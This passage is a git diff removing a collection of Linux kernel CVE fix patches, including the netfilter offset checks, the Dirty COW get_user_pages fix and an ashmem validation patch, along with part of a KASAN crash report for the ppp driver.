-[<      none      >] cleanup_net+0x4e5/0x600 kernel/net/core/net_namespace.c:448
-[<      none      >] process_one_work+0x794/0x1440 kernel/kernel/workqueue.c:2036
-[<      none      >] worker_thread+0xdb/0xfc0 kernel/kernel/workqueue.c:2170
-[<      none      >] kthread+0x23f/0x2d0 kernel/drivers/block/aoe/aoecmd.c:1303
-[<      none      >] ret_from_fork+0x3f/0x70 kernel/arch/x86/entry/entry_64.S:468
-INFO: Slab 0xffffea0001938800 objects=3 used=0 fp=0xffff880064e20000
-flags=0x5fffc0000004080
-INFO: Object 0xffff880064e20000 @offset=0 fp=0xffff880064e24200
-
-CPU: 1 PID: 11581 Comm: syz-executor Tainted: G    B           4.4.0+
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
-rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
- 00000000ffffffff ffff8800662c7790 ffffffff8292049d ffff88003e36a300
- ffff880064e20000 ffff880064e20000 ffff8800662c77c0 ffffffff816f2054
- ffff88003e36a300 ffffea0001938800 ffff880064e20000 0000000000000000
-Call Trace:
- [<     inline     >] __dump_stack kernel/lib/dump_stack.c:15
- [<ffffffff8292049d>] dump_stack+0x6f/0xa2 kernel/lib/dump_stack.c:50
- [<ffffffff816f2054>] print_trailer+0xf4/0x150 kernel/mm/slub.c:654
- [<ffffffff816f875f>] object_err+0x2f/0x40 kernel/mm/slub.c:661
- [<     inline     >] print_address_description kernel/mm/kasan/report.c:138
- [<ffffffff816fb0c5>] kasan_report_error+0x215/0x530 kernel/mm/kasan/report.c:236
- [<     inline     >] kasan_report kernel/mm/kasan/report.c:259
- [<ffffffff816fb4de>] __asan_report_load8_noabort+0x3e/0x40 kernel/mm/kasan/report.c:280
- [<     inline     >] ? ppp_pernet kernel/include/linux/compiler.h:218
- [<ffffffff83ad71b2>] ? ppp_unregister_channel+0x372/0x3a0 kernel/drivers/net/ppp/ppp_generic.c:2392
- [<     inline     >] ppp_pernet kernel/include/linux/compiler.h:218
- [<ffffffff83ad71b2>] ppp_unregister_channel+0x372/0x3a0 kernel/drivers/net/ppp/ppp_generic.c:2392
- [<     inline     >] ? ppp_pernet kernel/drivers/net/ppp/ppp_generic.c:293
- [<ffffffff83ad6f26>] ? ppp_unregister_channel+0xe6/0x3a0 kernel/drivers/net/ppp/ppp_generic.c:2392
- [<ffffffff83ae18f3>] ppp_asynctty_close+0xa3/0x130 kernel/drivers/net/ppp/ppp_async.c:241
- [<ffffffff83ae1850>] ? async_lcp_peek+0x5b0/0x5b0 kernel/drivers/net/ppp/ppp_async.c:1000
- [<ffffffff82c33239>] tty_ldisc_close.isra.1+0x99/0xe0 kernel/drivers/tty/tty_ldisc.c:478
- [<ffffffff82c332c0>] tty_ldisc_kill+0x40/0x170 kernel/drivers/tty/tty_ldisc.c:744
- [<ffffffff82c34943>] tty_ldisc_release+0x1b3/0x260 kernel/drivers/tty/tty_ldisc.c:772
- [<ffffffff82c1ef21>] tty_release+0xac1/0x13e0 kernel/drivers/tty/tty_io.c:1901
- [<ffffffff82c1e460>] ? release_tty+0x320/0x320 kernel/drivers/tty/tty_io.c:1688
- [<ffffffff8174de36>] __fput+0x236/0x780 kernel/fs/file_table.c:208
- [<ffffffff8174e405>] ____fput+0x15/0x20 kernel/fs/file_table.c:244
- [<ffffffff813595ab>] task_work_run+0x16b/0x200 kernel/kernel/task_work.c:115
- [<     inline     >] exit_task_work kernel/include/linux/task_work.h:21
- [<ffffffff81307105>] do_exit+0x8b5/0x2c60 kernel/kernel/exit.c:750
- [<ffffffff813fdd20>] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123
- [<ffffffff81306850>] ? mm_update_next_owner+0x6f0/0x6f0 kernel/kernel/exit.c:357
- [<ffffffff813215e6>] ? __dequeue_signal+0x136/0x470 kernel/kernel/signal.c:550
- [<ffffffff8132067b>] ? recalc_sigpending_tsk+0x13b/0x180 kernel/kernel/signal.c:145
- [<ffffffff81309628>] do_group_exit+0x108/0x330 kernel/kernel/exit.c:880
- [<ffffffff8132b9d4>] get_signal+0x5e4/0x14f0 kernel/kernel/signal.c:2307
- [<     inline     >] ? kretprobe_table_lock kernel/kernel/kprobes.c:1113
- [<ffffffff8151d355>] ? kprobe_flush_task+0xb5/0x450 kernel/kernel/kprobes.c:1158
- [<ffffffff8115f7d3>] do_signal+0x83/0x1c90 kernel/arch/x86/kernel/signal.c:712
- [<ffffffff8151d2a0>] ? recycle_rp_inst+0x310/0x310 kernel/include/linux/list.h:655
- [<ffffffff8115f750>] ? setup_sigcontext+0x780/0x780 kernel/arch/x86/kernel/signal.c:165
- [<ffffffff81380864>] ? finish_task_switch+0x424/0x5f0 kernel/kernel/sched/core.c:2692
- [<     inline     >] ? finish_lock_switch kernel/kernel/sched/sched.h:1099
- [<ffffffff81380560>] ? finish_task_switch+0x120/0x5f0 kernel/kernel/sched/core.c:2678
- [<     inline     >] ? context_switch kernel/kernel/sched/core.c:2807
- [<ffffffff85d794e9>] ? __schedule+0x919/0x1bd0 kernel/kernel/sched/core.c:3283
- [<ffffffff81003901>] exit_to_usermode_loop+0xf1/0x1a0 kernel/arch/x86/entry/common.c:247
- [<     inline     >] prepare_exit_to_usermode kernel/arch/x86/entry/common.c:282
- [<ffffffff810062ef>] syscall_return_slowpath+0x19f/0x210 kernel/arch/x86/entry/common.c:344
- [<ffffffff85d88022>] int_ret_from_sys_call+0x25/0x9f kernel/arch/x86/entry/entry_64.S:281
-Memory state around the buggy address:
- ffff880064e21680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff880064e21700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
->ffff880064e21780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-                                                       ^
- ffff880064e21800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff880064e21880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-==================================================================
-
-Fixes: 273ec51dd7ce ("net: ppp_generic - introduce net-namespace functionality v2")
-Reported-by: Baozeng Ding <sploving1@gmail.com>
-Signed-off-by: Guillaume Nault <g.nault@alphalink.fr>
-Reviewed-by: Cyrill Gorcunov <gorcunov@openvz.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- drivers/net/ppp/ppp_generic.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
-index 4fd8610..f572b31 100644
---- a/drivers/net/ppp/ppp_generic.c
-+++ b/drivers/net/ppp/ppp_generic.c
-@@ -2307,7 +2307,7 @@ int ppp_register_net_channel(struct net *net, struct ppp_channel *chan)
- 
- 	pch->ppp = NULL;
- 	pch->chan = chan;
--	pch->chan_net = net;
-+	pch->chan_net = get_net(net);
- 	chan->ppp = pch;
- 	init_ppp_file(&pch->file, CHANNEL);
- 	pch->file.hdrlen = chan->hdrlen;
-@@ -2404,6 +2404,8 @@ ppp_unregister_channel(struct ppp_channel *chan)
- 	spin_lock_bh(&pn->all_channels_lock);
- 	list_del(&pch->list);
- 	spin_unlock_bh(&pn->all_channels_lock);
-+	put_net(pch->chan_net);
-+	pch->chan_net = NULL;
- 
- 	pch->file.dead = 1;
- 	wake_up_interruptible(&pch->file.rwait);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4998/ANY/0001.patch
deleted file mode 100644
index 37e46d21..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0001.patch
+++ /dev/null
@@ -1,200 +0,0 @@
-From bdf533de6968e9686df777dc178486f600c6e617 Mon Sep 17 00:00:00 2001
-From: Florian Westphal <fw@strlen.de>
-Date: Tue, 22 Mar 2016 18:02:49 +0100
-Subject: netfilter: x_tables: validate e->target_offset early
-
-We should check that e->target_offset is sane before
-mark_source_chains gets called since it will fetch the target entry
-for loop detection.
-
-Signed-off-by: Florian Westphal <fw@strlen.de>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/ipv4/netfilter/arp_tables.c | 17 ++++++++---------
- net/ipv4/netfilter/ip_tables.c  | 17 ++++++++---------
- net/ipv6/netfilter/ip6_tables.c | 17 ++++++++---------
- 3 files changed, 24 insertions(+), 27 deletions(-)
-
-diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
-index bf08192..830bbe8 100644
---- a/net/ipv4/netfilter/arp_tables.c
-+++ b/net/ipv4/netfilter/arp_tables.c
-@@ -474,14 +474,12 @@ next:
- 	return 1;
- }
- 
--static inline int check_entry(const struct arpt_entry *e, const char *name)
-+static inline int check_entry(const struct arpt_entry *e)
- {
- 	const struct xt_entry_target *t;
- 
--	if (!arp_checkentry(&e->arp)) {
--		duprintf("arp_tables: arp check failed %p %s.\n", e, name);
-+	if (!arp_checkentry(&e->arp))
- 		return -EINVAL;
--	}
- 
- 	if (e->target_offset + sizeof(struct xt_entry_target) > e->next_offset)
- 		return -EINVAL;
-@@ -522,10 +520,6 @@ find_check_entry(struct arpt_entry *e, const char *name, unsigned int size)
- 	struct xt_target *target;
- 	int ret;
- 
--	ret = check_entry(e, name);
--	if (ret)
--		return ret;
--
- 	e->counters.pcnt = xt_percpu_counter_alloc();
- 	if (IS_ERR_VALUE(e->counters.pcnt))
- 		return -ENOMEM;
-@@ -576,6 +570,7 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e,
- 					     unsigned int valid_hooks)
- {
- 	unsigned int h;
-+	int err;
- 
- 	if ((unsigned long)e % __alignof__(struct arpt_entry) != 0 ||
- 	    (unsigned char *)e + sizeof(struct arpt_entry) >= limit) {
-@@ -590,6 +585,10 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e,
- 		return -EINVAL;
- 	}
- 
-+	err = check_entry(e);
-+	if (err)
-+		return err;
-+
- 	/* Check hooks & underflows */
- 	for (h = 0; h < NF_ARP_NUMHOOKS; h++) {
- 		if (!(valid_hooks & (1 << h)))
-@@ -1246,7 +1245,7 @@ check_compat_entry_size_and_hooks(struct compat_arpt_entry *e,
- 	}
- 
- 	/* For purposes of check_entry casting the compat entry is fine */
--	ret = check_entry((struct arpt_entry *)e, name);
-+	ret = check_entry((struct arpt_entry *)e);
- 	if (ret)
- 		return ret;
- 
-diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
-index e53f8d6..1d72a3c 100644
---- a/net/ipv4/netfilter/ip_tables.c
-+++ b/net/ipv4/netfilter/ip_tables.c
-@@ -569,14 +569,12 @@ static void cleanup_match(struct xt_entry_match *m, struct net *net)
- }
- 
- static int
--check_entry(const struct ipt_entry *e, const char *name)
-+check_entry(const struct ipt_entry *e)
- {
- 	const struct xt_entry_target *t;
- 
--	if (!ip_checkentry(&e->ip)) {
--		duprintf("ip check failed %p %s.\n", e, name);
-+	if (!ip_checkentry(&e->ip))
- 		return -EINVAL;
--	}
- 
- 	if (e->target_offset + sizeof(struct xt_entry_target) >
- 	    e->next_offset)
-@@ -666,10 +664,6 @@ find_check_entry(struct ipt_entry *e, struct net *net, const char *name,
- 	struct xt_mtchk_param mtpar;
- 	struct xt_entry_match *ematch;
- 
--	ret = check_entry(e, name);
--	if (ret)
--		return ret;
--
- 	e->counters.pcnt = xt_percpu_counter_alloc();
- 	if (IS_ERR_VALUE(e->counters.pcnt))
- 		return -ENOMEM;
-@@ -741,6 +735,7 @@ check_entry_size_and_hooks(struct ipt_entry *e,
- 			   unsigned int valid_hooks)
- {
- 	unsigned int h;
-+	int err;
- 
- 	if ((unsigned long)e % __alignof__(struct ipt_entry) != 0 ||
- 	    (unsigned char *)e + sizeof(struct ipt_entry) >= limit) {
-@@ -755,6 +750,10 @@ check_entry_size_and_hooks(struct ipt_entry *e,
- 		return -EINVAL;
- 	}
- 
-+	err = check_entry(e);
-+	if (err)
-+		return err;
-+
- 	/* Check hooks & underflows */
- 	for (h = 0; h < NF_INET_NUMHOOKS; h++) {
- 		if (!(valid_hooks & (1 << h)))
-@@ -1506,7 +1505,7 @@ check_compat_entry_size_and_hooks(struct compat_ipt_entry *e,
- 	}
- 
- 	/* For purposes of check_entry casting the compat entry is fine */
--	ret = check_entry((struct ipt_entry *)e, name);
-+	ret = check_entry((struct ipt_entry *)e);
- 	if (ret)
- 		return ret;
- 
-diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
-index 84f9baf..26a5ad1 100644
---- a/net/ipv6/netfilter/ip6_tables.c
-+++ b/net/ipv6/netfilter/ip6_tables.c
-@@ -581,14 +581,12 @@ static void cleanup_match(struct xt_entry_match *m, struct net *net)
- }
- 
- static int
--check_entry(const struct ip6t_entry *e, const char *name)
-+check_entry(const struct ip6t_entry *e)
- {
- 	const struct xt_entry_target *t;
- 
--	if (!ip6_checkentry(&e->ipv6)) {
--		duprintf("ip_tables: ip check failed %p %s.\n", e, name);
-+	if (!ip6_checkentry(&e->ipv6))
- 		return -EINVAL;
--	}
- 
- 	if (e->target_offset + sizeof(struct xt_entry_target) >
- 	    e->next_offset)
-@@ -679,10 +677,6 @@ find_check_entry(struct ip6t_entry *e, struct net *net, const char *name,
- 	struct xt_mtchk_param mtpar;
- 	struct xt_entry_match *ematch;
- 
--	ret = check_entry(e, name);
--	if (ret)
--		return ret;
--
- 	e->counters.pcnt = xt_percpu_counter_alloc();
- 	if (IS_ERR_VALUE(e->counters.pcnt))
- 		return -ENOMEM;
-@@ -753,6 +747,7 @@ check_entry_size_and_hooks(struct ip6t_entry *e,
- 			   unsigned int valid_hooks)
- {
- 	unsigned int h;
-+	int err;
- 
- 	if ((unsigned long)e % __alignof__(struct ip6t_entry) != 0 ||
- 	    (unsigned char *)e + sizeof(struct ip6t_entry) >= limit) {
-@@ -767,6 +762,10 @@ check_entry_size_and_hooks(struct ip6t_entry *e,
- 		return -EINVAL;
- 	}
- 
-+	err = check_entry(e);
-+	if (err)
-+		return err;
-+
- 	/* Check hooks & underflows */
- 	for (h = 0; h < NF_INET_NUMHOOKS; h++) {
- 		if (!(valid_hooks & (1 << h)))
-@@ -1518,7 +1517,7 @@ check_compat_entry_size_and_hooks(struct compat_ip6t_entry *e,
- 	}
- 
- 	/* For purposes of check_entry casting the compat entry is fine */
--	ret = check_entry((struct ip6t_entry *)e, name);
-+	ret = check_entry((struct ip6t_entry *)e);
- 	if (ret)
- 		return ret;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-4998/ANY/0002.patch
deleted file mode 100644
index 8b21bbdb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4998/ANY/0002.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91 Mon Sep 17 00:00:00 2001
-From: Florian Westphal <fw@strlen.de>
-Date: Tue, 22 Mar 2016 18:02:50 +0100
-Subject: netfilter: x_tables: make sure e->next_offset covers remaining blob
- size
-
-Otherwise this function may read data beyond the ruleset blob.
-
-Signed-off-by: Florian Westphal <fw@strlen.de>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/ipv4/netfilter/arp_tables.c | 6 ++++--
- net/ipv4/netfilter/ip_tables.c  | 6 ++++--
- net/ipv6/netfilter/ip6_tables.c | 6 ++++--
- 3 files changed, 12 insertions(+), 6 deletions(-)
-
-diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
-index 830bbe8..51d4fe5 100644
---- a/net/ipv4/netfilter/arp_tables.c
-+++ b/net/ipv4/netfilter/arp_tables.c
-@@ -573,7 +573,8 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e,
- 	int err;
- 
- 	if ((unsigned long)e % __alignof__(struct arpt_entry) != 0 ||
--	    (unsigned char *)e + sizeof(struct arpt_entry) >= limit) {
-+	    (unsigned char *)e + sizeof(struct arpt_entry) >= limit ||
-+	    (unsigned char *)e + e->next_offset > limit) {
- 		duprintf("Bad offset %p\n", e);
- 		return -EINVAL;
- 	}
-@@ -1232,7 +1233,8 @@ check_compat_entry_size_and_hooks(struct compat_arpt_entry *e,
- 
- 	duprintf("check_compat_entry_size_and_hooks %p\n", e);
- 	if ((unsigned long)e % __alignof__(struct compat_arpt_entry) != 0 ||
--	    (unsigned char *)e + sizeof(struct compat_arpt_entry) >= limit) {
-+	    (unsigned char *)e + sizeof(struct compat_arpt_entry) >= limit ||
-+	    (unsigned char *)e + e->next_offset > limit) {
- 		duprintf("Bad offset %p, limit = %p\n", e, limit);
- 		return -EINVAL;
- 	}
-diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
-index 1d72a3c..fb7694e6 100644
---- a/net/ipv4/netfilter/ip_tables.c
-+++ b/net/ipv4/netfilter/ip_tables.c
-@@ -738,7 +738,8 @@ check_entry_size_and_hooks(struct ipt_entry *e,
- 	int err;
- 
- 	if ((unsigned long)e % __alignof__(struct ipt_entry) != 0 ||
--	    (unsigned char *)e + sizeof(struct ipt_entry) >= limit) {
-+	    (unsigned char *)e + sizeof(struct ipt_entry) >= limit ||
-+	    (unsigned char *)e + e->next_offset > limit) {
- 		duprintf("Bad offset %p\n", e);
- 		return -EINVAL;
- 	}
-@@ -1492,7 +1493,8 @@ check_compat_entry_size_and_hooks(struct compat_ipt_entry *e,
- 
- 	duprintf("check_compat_entry_size_and_hooks %p\n", e);
- 	if ((unsigned long)e % __alignof__(struct compat_ipt_entry) != 0 ||
--	    (unsigned char *)e + sizeof(struct compat_ipt_entry) >= limit) {
-+	    (unsigned char *)e + sizeof(struct compat_ipt_entry) >= limit ||
-+	    (unsigned char *)e + e->next_offset > limit) {
- 		duprintf("Bad offset %p, limit = %p\n", e, limit);
- 		return -EINVAL;
- 	}
-diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
-index 26a5ad1..b248528f 100644
---- a/net/ipv6/netfilter/ip6_tables.c
-+++ b/net/ipv6/netfilter/ip6_tables.c
-@@ -750,7 +750,8 @@ check_entry_size_and_hooks(struct ip6t_entry *e,
- 	int err;
- 
- 	if ((unsigned long)e % __alignof__(struct ip6t_entry) != 0 ||
--	    (unsigned char *)e + sizeof(struct ip6t_entry) >= limit) {
-+	    (unsigned char *)e + sizeof(struct ip6t_entry) >= limit ||
-+	    (unsigned char *)e + e->next_offset > limit) {
- 		duprintf("Bad offset %p\n", e);
- 		return -EINVAL;
- 	}
-@@ -1504,7 +1505,8 @@ check_compat_entry_size_and_hooks(struct compat_ip6t_entry *e,
- 
- 	duprintf("check_compat_entry_size_and_hooks %p\n", e);
- 	if ((unsigned long)e % __alignof__(struct compat_ip6t_entry) != 0 ||
--	    (unsigned char *)e + sizeof(struct compat_ip6t_entry) >= limit) {
-+	    (unsigned char *)e + sizeof(struct compat_ip6t_entry) >= limit ||
-+	    (unsigned char *)e + e->next_offset > limit) {
- 		duprintf("Bad offset %p, limit = %p\n", e, limit);
- 		return -EINVAL;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5195/ANY/0001.patch
deleted file mode 100644
index b4d3fc9c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 9691eac5593ff1e2f82391ad327f21d90322aec1 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Thu, 13 Oct 2016 13:07:36 -0700
-Subject: mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
-
-commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
-
-This is an ancient bug that was actually attempted to be fixed once
-(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
-get_user_pages() race for write access") but that was then undone due to
-problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
-
-In the meantime, the s390 situation has long been fixed, and we can now
-fix it by checking the pte_dirty() bit properly (and do it better).  The
-s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
-software dirty bits") which made it into v3.9.  Earlier kernels will
-have to look at the page state itself.
-
-Also, the VM has become more scalable, and what used a purely
-theoretical race back then has become easier to trigger.
-
-To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
-we already did a COW" rather than play racy games with FOLL_WRITE that
-is very fundamental, and then use the pte dirty flag to validate that
-the FOLL_COW flag is still valid.
-
-Reported-and-tested-by: Phil "not Paul" Oester <kernel@linuxace.com>
-Acked-by: Hugh Dickins <hughd@google.com>
-Reviewed-by: Michal Hocko <mhocko@suse.com>
-Cc: Andy Lutomirski <luto@kernel.org>
-Cc: Kees Cook <keescook@chromium.org>
-Cc: Oleg Nesterov <oleg@redhat.com>
-Cc: Willy Tarreau <w@1wt.eu>
-Cc: Nick Piggin <npiggin@gmail.com>
-Cc: Greg Thelen <gthelen@google.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-[wt: s/gup.c/memory.c; s/follow_page_pte/follow_page_mask;
-     s/faultin_page/__get_user_page]
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
- include/linux/mm.h |  1 +
- mm/memory.c        | 14 ++++++++++++--
- 2 files changed, 13 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index 53b0d70..55590f4 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -1715,6 +1715,7 @@ static inline struct page *follow_page(struct vm_area_struct *vma,
- #define FOLL_HWPOISON	0x100	/* check page is hwpoisoned */
- #define FOLL_NUMA	0x200	/* force NUMA hinting page fault */
- #define FOLL_MIGRATION	0x400	/* wait for page to replace migration entry */
-+#define FOLL_COW	0x4000	/* internal GUP flag */
- 
- typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
- 			void *data);
-diff --git a/mm/memory.c b/mm/memory.c
-index 10cdade..2ca2ee1 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -1462,6 +1462,16 @@ int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
- }
- EXPORT_SYMBOL_GPL(zap_vma_ptes);
- 
-+/*
-+ * FOLL_FORCE can write to even unwritable pte's, but only
-+ * after we've gone through a COW cycle and they are dirty.
-+ */
-+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-+{
-+	return pte_write(pte) ||
-+		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
-+}
-+
- /**
-  * follow_page_mask - look up a page descriptor from a user-virtual address
-  * @vma: vm_area_struct mapping @address
-@@ -1569,7 +1579,7 @@ split_fallthrough:
- 	}
- 	if ((flags & FOLL_NUMA) && pte_numa(pte))
- 		goto no_page;
--	if ((flags & FOLL_WRITE) && !pte_write(pte))
-+	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags))
- 		goto unlock;
- 
- 	page = vm_normal_page(vma, address, pte);
-@@ -1877,7 +1887,7 @@ long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
- 				 */
- 				if ((ret & VM_FAULT_WRITE) &&
- 				    !(vma->vm_flags & VM_WRITE))
--					foll_flags &= ~FOLL_WRITE;
-+					foll_flags |= FOLL_COW;
- 
- 				cond_resched();
- 			}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-5195/ANY/0002.patch
deleted file mode 100644
index c1b8aea7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5195/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From e45a502bdeae5a075257c4f061d1ff4ff0821354 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Thu, 13 Oct 2016 13:07:36 -0700
-Subject: mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
-
-[ Upstream commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 ]
-
-This is an ancient bug that was actually attempted to be fixed once
-(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
-get_user_pages() race for write access") but that was then undone due to
-problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
-
-In the meantime, the s390 situation has long been fixed, and we can now
-fix it by checking the pte_dirty() bit properly (and do it better).  The
-s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
-software dirty bits") which made it into v3.9.  Earlier kernels will
-have to look at the page state itself.
-
-Also, the VM has become more scalable, and what used a purely
-theoretical race back then has become easier to trigger.
-
-To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
-we already did a COW" rather than play racy games with FOLL_WRITE that
-is very fundamental, and then use the pte dirty flag to validate that
-the FOLL_COW flag is still valid.
-
-Reported-and-tested-by: Phil "not Paul" Oester <kernel@linuxace.com>
-Acked-by: Hugh Dickins <hughd@google.com>
-Reviewed-by: Michal Hocko <mhocko@suse.com>
-Cc: Andy Lutomirski <luto@kernel.org>
-Cc: Kees Cook <keescook@chromium.org>
-Cc: Oleg Nesterov <oleg@redhat.com>
-Cc: Willy Tarreau <w@1wt.eu>
-Cc: Nick Piggin <npiggin@gmail.com>
-Cc: Greg Thelen <gthelen@google.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Sasha Levin <alexander.levin@verizon.com>
----
- include/linux/mm.h |  1 +
- mm/gup.c           | 14 ++++++++++++--
- 2 files changed, 13 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index 9eef3a1..db853de 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -2029,6 +2029,7 @@ static inline struct page *follow_page(struct vm_area_struct *vma,
- #define FOLL_NUMA	0x200	/* force NUMA hinting page fault */
- #define FOLL_MIGRATION	0x400	/* wait for page to replace migration entry */
- #define FOLL_TRIED	0x800	/* a retry, previous pass started an IO */
-+#define FOLL_COW	0x4000	/* internal GUP flag */
- 
- typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
- 			void *data);
-diff --git a/mm/gup.c b/mm/gup.c
-index 377a5a7..3cec4df 100644
---- a/mm/gup.c
-+++ b/mm/gup.c
-@@ -32,6 +32,16 @@ static struct page *no_page_table(struct vm_area_struct *vma,
- 	return NULL;
- }
- 
-+/*
-+ * FOLL_FORCE can write to even unwritable pte's, but only
-+ * after we've gone through a COW cycle and they are dirty.
-+ */
-+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-+{
-+	return pte_write(pte) ||
-+		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
-+}
-+
- static struct page *follow_page_pte(struct vm_area_struct *vma,
- 		unsigned long address, pmd_t *pmd, unsigned int flags)
- {
-@@ -66,7 +76,7 @@ retry:
- 	}
- 	if ((flags & FOLL_NUMA) && pte_numa(pte))
- 		goto no_page;
--	if ((flags & FOLL_WRITE) && !pte_write(pte)) {
-+	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
- 		pte_unmap_unlock(ptep, ptl);
- 		return NULL;
- 	}
-@@ -315,7 +325,7 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
- 	 * reCOWed by userspace write).
- 	 */
- 	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
--		*flags &= ~FOLL_WRITE;
-+	        *flags |= FOLL_COW;
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5340/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5340/ANY/0001.patch
deleted file mode 100644
index a2e3ed84..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5340/ANY/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 06e51489061e5473b4e2035c79dcf7c27a6f75a6 Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Wed, 22 Jun 2016 14:45:31 +0530
-Subject: ashmem: Validate ashmem memory with fops pointer
-
-Validate the ashmem memory entry against f_op pointer
-rather then comparing its name with path of the dentry.
-
-This is to avoid any invalid access to ashmem area in cases
-where some one deliberately set the dentry name to /ashmem.
-
-Change-Id: I74e50cd244f68cb13009cf2355e528485f4de34b
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
----
- drivers/staging/android/ashmem.c | 42 +++++++++++++++++++---------------------
- 1 file changed, 20 insertions(+), 22 deletions(-)
-
-diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c
-index 808acd4..ee79ac8 100644
---- a/drivers/staging/android/ashmem.c
-+++ b/drivers/staging/android/ashmem.c
-@@ -766,11 +766,28 @@ static long compat_ashmem_ioctl(struct file *file, unsigned int cmd, unsigned lo
- }
- #endif
- 
-+static const struct file_operations ashmem_fops = {
-+	.owner = THIS_MODULE,
-+	.open = ashmem_open,
-+	.release = ashmem_release,
-+	.read = ashmem_read,
-+	.llseek = ashmem_llseek,
-+	.mmap = ashmem_mmap,
-+	.unlocked_ioctl = ashmem_ioctl,
-+#ifdef CONFIG_COMPAT
-+	.compat_ioctl = compat_ashmem_ioctl,
-+#endif
-+};
-+
-+static struct miscdevice ashmem_misc = {
-+	.minor = MISC_DYNAMIC_MINOR,
-+	.name = "ashmem",
-+	.fops = &ashmem_fops,
-+};
-+
- static int is_ashmem_file(struct file *file)
- {
--	char fname[256], *name;
